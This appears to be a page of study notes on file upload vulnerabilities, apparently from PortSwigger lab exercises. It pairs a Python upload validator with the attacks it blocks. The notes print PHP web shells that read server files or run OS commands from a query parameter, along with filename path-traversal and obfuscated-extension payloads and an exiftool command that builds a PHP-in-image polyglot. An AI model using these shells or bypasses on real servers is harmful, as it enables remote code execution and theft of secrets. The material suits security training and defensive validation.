Web Security Notes
File upload Vulnerabilities notes (Portswigger)

Read a file from the server's filesystem:
<?php echo file_get_contents('/path/to/target/file'); ?>
Run the OS command passed in the command query parameter:
<?php echo system($_GET['command']); ?>

Execute a command with the request: GET /example/exploit.php?command=id HTTP/1.1

1. Remote code execution via web shell upload

<?php echo file_get_contents('/home/carlos/secret'); ?>

GET /files/avatars/exploit.php

2. Content-Type restriction bypass

  • change the Content-Type of the uploaded file to image/png in the POST request

3. Web shell upload via path traversal

  • move the upload one directory up by changing the filename in the header: Content-Disposition: form-data; name="avatar"; filename="..%2fexploit.php"

4. Web shell upload via obfuscated file extension

  • exploit.pHp

  • exploit.php.jpg

  • exploit%2ephp

  • exploit.php%00.jpg

  • exploit.asp;.jpg, exploit.asp%00.jpg

5. Web shell with polyglot

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" your_image.png -o polygoat.php
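
A server-side check that rejects the filenames from sections 3 and 4, ignores the client's Content-Type (section 2), and never stores a polyglot (section 5) under an executable extension. This is an added example in Python, not part of the original notes; validate_upload, MAGIC, NAME_RE and the sample bytes are names and values assumed for illustration.

```python
import re
import secrets

# Allowlisted extensions and the magic bytes each file must start with.
MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# One stem, one dot, one extension. '%', ';', NUL, '/', '\' and a second
# dot are all outside the character classes, so such names never match.
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})")

# Names taken from the notes above; all must be rejected.
PAGE_NAMES = ["..%2fexploit.php", "exploit.pHp", "exploit.php.jpg",
              "exploit%2ephp", "exploit.php%00.jpg", "exploit.asp;.jpg",
              "exploit.asp%00.jpg", "polygoat.php"]
# Constructed sample: PNG signature followed by filler bytes.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16


def validate_upload(client_name, client_content_type, data):
    """Return a server-generated storage name, or None to reject.

    client_content_type is ignored on purpose: the client controls it.
    """
    m = NAME_RE.fullmatch(client_name)
    if m is None:
        return None
    ext = m.group(1).lower()  # normalise case before the allowlist lookup
    signatures = MAGIC.get(ext)
    if signatures is None or not data.startswith(signatures):
        return None
    # A polyglot image still passes the signature check, so the stored name
    # never reuses client input: random stem plus the allowlisted extension.
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    for name in PAGE_NAMES:
        print(name, "->", validate_upload(name, "image/png", SAMPLE_PNG))
    print("avatar.png ->", validate_upload("avatar.png", "text/plain", SAMPLE_PNG))
```

Pair this with an upload directory that the web server serves as static files only, so a stored file is never handed to a script interpreter.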

Last updated 2 years ago